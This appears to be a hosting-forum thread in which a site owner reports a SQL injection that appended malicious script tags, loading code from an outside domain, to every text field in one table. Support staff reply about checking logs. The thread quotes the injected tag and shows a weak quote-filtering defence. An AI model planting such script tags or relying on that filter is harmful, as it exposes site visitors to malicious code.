HELP, Database hacked

Z

zMaestro

Perch
Hi,
my database is hacked twice in less than 1 day.
SQL injection I think.

ALL Fields in database has an attached text after it
<script src="http://w.robints.us/us/js></script><script src="http://w.robints.us/us/js></script>
Click to expand...

twice added after each filed values in all fields

I am protecting against SQL injection using this ASP script:
IF InStr(Request.QueryString, "'") Then Response.Redirect "/?"
Click to expand...

Help please looks like it is not enough.

Can Jodo provide me any details about the hacker location?

thanks
 
That would be in http logs to find the hacking in this case, we can aid a bit but may not be able to pinpoint.

SQL injection may be 'protected' at some level, but unprotected on a subpage or direct query via another page, not uncommon at all.
 
I checked the hacked database, only one table is hacked.
all fields in this table that is not blank and is text has this javascript text added to
 
If provide us domain name, we can check web logs for it. By which we were able to tell you IP of hacker and page which they are using to hack your database.
 
The issue is that this database is shared between many domains under the same account.
Is there any advise how can I protect form SQL injection?
I've this script before any connection opening
<%
IF InStr(Request.QueryString, "'") Then Response.Redirect "/?"
%>
Click to expand...
 
zMaestro said:
The issue is that this database is shared between many domains under the same account.
Is there any advise how can I protect form SQL injection?
I've this script before any connection opening
Click to expand...

If it is shared by many domains, it means we will have a very hard time looking into it for you, we can work with you to send raw http logs then you can look for keywords like 'VARCHAR'
'SELECT' etc.

We can't protect the Db on DB side, as to DB, it is a legit connection from authorized source(web server), using valid credentials as provided in your config. For the asp/asp.net pages themselves, we aren't developers but maybe some others can help.
 
HELP Database h

you need to use a server-side language like: perl, php, asp, etc. to get and put data to and from the database.

such scripts are very complex and can be very had to make.
 
You must log in or register to reply here.
Back
Top